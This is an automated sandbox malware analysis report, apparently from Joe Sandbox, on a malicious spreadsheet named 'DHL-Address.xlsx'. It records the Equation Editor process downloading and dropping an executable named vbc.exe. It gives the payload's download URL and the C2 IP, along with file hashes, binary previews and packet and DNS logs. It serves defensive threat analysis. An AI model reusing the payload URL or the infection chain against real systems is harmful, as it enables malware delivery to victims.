                                                                                              Preview: p...... ........r.......(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:downloaded
                                                                                              Size (bytes):843776
                                                                                              Entropy (8bit):7.300736524263088
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:8XT4rp65D+SL7y7INIIdGZMonTVA2Wsa8tpJKS:VhSJNILZn62WJ8td
                                                                                              MD5:B232B5C7754D932B07C0D47F934EFBFE
                                                                                              SHA1:7C3D92552F6EBAB8956727BEECAAC5D22C87A55B
                                                                                              SHA-256:3311CEA59262B019A69FB72B72A36FC8E55D48A0F14F853B3A52FC8740542E99
                                                                                              SHA-512:4E3ABE570FA413FB74B1EFCF56560D5275CBCAF8217779E46DC65E13C2185C23F0BE2B01B91DCB5AEAD24C6F68E8F84B432B7EFBA87F2CC835BFA2848A406740
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Reputation:low
                                                                                              IE Cache URL:http://globuserinessserverfiletransferprotocol.mangospot.net/csrss/vbc.exe
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._..............P.............>.... ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................ .......H.......<X...............................................................(....*&..(.....*.s ........s!........s"........s#........s$........*...0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0...........~....o)....+..*&..(*....*...0..<........~.....(+.....,!r...p.....(,...o-...s.............~.....+..*.0...........~.....+..*".......*.0...........(....r=..p~....o/....+..*...0..<........~.....(+.....,!rG..p.....(,
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\102D7B51.jpeg
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                              Category:dropped
                                                                                              Size (bytes):48770
                                                                                              Entropy (8bit):7.801842363879827
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                              MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                              SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                              SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                              SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5B636490.emf
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                              Category:dropped
                                                                                              Size (bytes):1099960
                                                                                              Entropy (8bit):2.0152876288887174
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:WXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:EahIFdyiaT2qtXw
                                                                                              MD5:6DAD8275F83B986347FE666567C7FFD0
                                                                                              SHA1:51F5A7972D7E082B5EE36B2680EEA2EE75BBFEEE
                                                                                              SHA-256:03B22F8AD84430F5C1064C38D88F66F2A224BF97DDC82A21AAB379C6078B917D
                                                                                              SHA-512:32BB953D0F9DB9FA01FA1874A229766EB6ED57F177B18748899EC32375DB070AC32C7DBFBA08305F69C81401135397651D2FED6B4FFFC93844734BEB1E8E7106
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview: ....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................)...).......).t.)..N.R..)...).....\.)...)..N.R..)...). ....ySQ..)...). .........E..zSQ............?...............................X...%...7...................{ .@................C.a.l.i.b.r...............).X.....). .)..2LQ........\.).\.)..{JQ......)...E.dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC5A891E.jpeg
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                              Category:dropped
                                                                                              Size (bytes):48770
                                                                                              Entropy (8bit):7.801842363879827
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                              MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                              SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                              SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                              SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                              C:\Users\user\AppData\Local\Temp\CabCFB4.tmp
                                                                                              Process:C:\Users\Public\vbc.exe
                                                                                              File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                              Category:dropped
                                                                                              Size (bytes):58936
                                                                                              Entropy (8bit):7.994797855729196
                                                                                              Encrypted:true
                                                                                              SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                              MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                              SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                              SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                              SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                              C:\Users\user\AppData\Local\Temp\TarCFB5.tmp
                                                                                              Process:C:\Users\Public\vbc.exe
                                                                                              File Type:data
                                                                                              Category:modified
                                                                                              Size (bytes):152533
                                                                                              Entropy (8bit):6.31602258454967
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                                              MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                                              SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                                              SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                                              SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
C:\Users\user\Desktop\~$DHL-Address.xlsx
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 330
Entropy (8bit): 1.4377382811115937
Encrypted: false
SSDEEP: 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5: 96114D75E30EBD26B572C1FC83D1D02E
SHA1: A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256: 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512: 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious: true
Reputation: moderate, very likely benign file
C:\Users\Public\vbc.exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 843776
Entropy (8bit): 7.300736524263088
Encrypted: false
SSDEEP: 12288:8XT4rp65D+SL7y7INIIdGZMonTVA2Wsa8tpJKS:VhSJNILZn62WJ8td
MD5: B232B5C7754D932B07C0D47F934EFBFE
SHA1: 7C3D92552F6EBAB8956727BEECAAC5D22C87A55B
SHA-256: 3311CEA59262B019A69FB72B72A36FC8E55D48A0F14F853B3A52FC8740542E99
SHA-512: 4E3ABE570FA413FB74B1EFCF56560D5275CBCAF8217779E46DC65E13C2185C23F0BE2B01B91DCB5AEAD24C6F68E8F84B432B7EFBA87F2CC835BFA2848A406740
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%

Static File Info

General

File type: Microsoft Excel 2007+
Entropy (8bit): 7.995116916272445
TrID:
• Excel Microsoft Office Open XML Format document (40004/1) 83.33%
• ZIP compressed archive (8000/1) 16.67%
File name: DHL-Address.xlsx
File size: 600867
MD5: 5de2e8bdb620804fd22d76f1e9fedf6e
SHA1: 942ce29cd8138a1594ee416debf753d8eaa71528
SHA256: f5c3bea5b81c221bc8737bd8489154745c8d6644d7d19484218151f9a1c1f656
SHA512: f24f1d93e61dffe4c48995e0a1ef039b7346cbd9f94a65dffac4d360b5f7419306bcffd57f403a7a6764dd38d7ec9b59e1d0462703f834edc368c38bda939e53
SSDEEP: 12288:pT8QDq8fMa8L7PerWcF35XNjIko4RH2SMU6ZHAz1OJicXVh/2DV3:tTrUa8LaWkPBdWI1YiJ53

File Icon

Icon Hash: e4e2aa8aa4b4bcb4

Static OLE Info

General

Document Type: OpenXML
Number of OLE Files: 1

OLE File "/opt/package/joesandbox/database/analysis/339078/sample/DHL-Address.xlsx"

Indicators

Has Summary Info: False
Application Name: unknown
Encrypted Document: False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros: False

Summary

Author:
Last Saved By:
Create Time: 2006-09-16T00:00:00Z
Last Saved Time: 2021-01-13T08:51:14Z
Creating Application: Microsoft Excel
Security: 0

Document Summary

Thumbnail Scaling Desired: false
Company:
Contains Dirty Links: false
Shared Document: false
Changed Hyperlinks: false
Application Version: 12.0000

Streams

Stream Path: \x1Ole, File Type: data, Stream Size: 20
General
Stream Path: \x1Ole
File Type: data
Stream Size: 20
Entropy: 0.568995593589
Base64 Encoded: False
Data ASCII: . . . . . . . . . . . . . . . . . . . .
Data Raw: 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Stream Path: \x1oLe10NatIve, File Type: data, Stream Size: 406296
General
Stream Path: \x1oLe10NatIve
File Type: data
Stream Size: 406296
Entropy: 7.99509276826
Base64 Encoded: True

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 13, 2021 13:17:21.988862038 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.162621021 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.162832975 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.163568020 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.339915037 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.339965105 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.340003967 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.340055943 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.340075970 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.340146065 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.340153933 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.340158939 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.514180899 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.514231920 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.514280081 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.514326096 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.514339924 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.514375925 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.514379025 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.514383078 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.514400005 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.514419079 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.514425039 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.514458895 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.514488935 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.514496088 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.514523983 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.514544964 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.691092968 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.691152096 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.691190958 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.691214085 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.691234112 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.691241980 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.691246986 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.691274881 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.691288948 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.691313982 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.691327095 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.691351891 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.691366911 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.691430092 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.691390991 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.691485882 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.691500902 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.691528082 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.691566944 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.691567898 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.691576004 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.691616058 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.691617966 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.691659927 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.691668034 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.691699028 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.691710949 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.691736937 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.691750050 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.691776037 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.691790104 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.691833973 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.695110083 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.865525961 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.865576982 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.865614891 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.865653038 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.865689039 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.865726948 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.865763903 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.865811110 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.865808964 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.865850925 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.865854025 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.865856886 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.865875006 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.865892887 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.865922928 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.865930080 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.865936041 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.865969896 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.865993023 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.866007090 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.866035938 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.866044998 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.866063118 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.866082907 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.866101027 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.866130114 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.866139889 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.866190910 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.866199017 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.866245031 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.866262913 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.866283894 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.866298914 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.866322041 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.866336107 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.866358995 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.866372108 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178
Jan 13, 2021 13:17:22.866395950 CET | 80 | 49165 | 192.210.214.178 | 192.168.2.22
Jan 13, 2021 13:17:22.866436958 CET | 49165 | 80 | 192.168.2.22 | 192.210.214.178

UDP Packets

Timestamp                           | Source Port | Dest Port | Source IP    | Dest IP
Jan 13, 2021 13:17:21.147867918 CET | 52197       | 53        | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:17:21.508595943 CET | 53          | 52197     | 8.8.8.8      | 192.168.2.22
Jan 13, 2021 13:17:21.509027958 CET | 52197       | 53        | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:17:21.856992006 CET | 53          | 52197     | 8.8.8.8      | 192.168.2.22
Jan 13, 2021 13:17:21.857408047 CET | 52197       | 53        | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:17:21.913824081 CET | 53          | 52197     | 8.8.8.8      | 192.168.2.22
Jan 13, 2021 13:17:21.914427996 CET | 52197       | 53        | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:17:21.970621109 CET | 53          | 52197     | 8.8.8.8      | 192.168.2.22
Jan 13, 2021 13:19:00.284296989 CET | 53099       | 53        | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:19:00.342308998 CET | 53          | 53099     | 8.8.8.8      | 192.168.2.22
Jan 13, 2021 13:19:02.322484016 CET | 52838       | 53        | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:19:02.370596886 CET | 53          | 52838     | 8.8.8.8      | 192.168.2.22
Jan 13, 2021 13:19:02.371534109 CET | 52838       | 53        | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:19:02.419559956 CET | 53          | 52838     | 8.8.8.8      | 192.168.2.22
Jan 13, 2021 13:19:02.458683968 CET | 61200       | 53        | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:19:02.515177011 CET | 53          | 61200     | 8.8.8.8      | 192.168.2.22
Jan 13, 2021 13:19:02.515755892 CET | 61200       | 53        | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 13:19:02.563786030 CET | 53          | 61200     | 8.8.8.8      | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 13, 2021 13:17:21.147867918 CET | 192.168.2.22 | 8.8.8.8 | 0xfc39 | Standard query (0) | globuserinessserverfiletransferprotocol.mangospot.net | A (IP address) | IN (0x0001)
Jan 13, 2021 13:17:21.509027958 CET | 192.168.2.22 | 8.8.8.8 | 0xfc39 | Standard query (0) | globuserinessserverfiletransferprotocol.mangospot.net | A (IP address) | IN (0x0001)
Jan 13, 2021 13:17:21.857408047 CET | 192.168.2.22 | 8.8.8.8 | 0xfc39 | Standard query (0) | globuserinessserverfiletransferprotocol.mangospot.net | A (IP address) | IN (0x0001)
Jan 13, 2021 13:17:21.914427996 CET | 192.168.2.22 | 8.8.8.8 | 0xfc39 | Standard query (0) | globuserinessserverfiletransferprotocol.mangospot.net | A (IP address) | IN (0x0001)
Jan 13, 2021 13:19:00.284296989 CET | 192.168.2.22 | 8.8.8.8 | 0x5aac | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 13, 2021 13:17:21.508595943 CET | 8.8.8.8 | 192.168.2.22 | 0xfc39 | No error (0) | globuserinessserverfiletransferprotocol.mangospot.net | | 192.210.214.178 | A (IP address) | IN (0x0001)
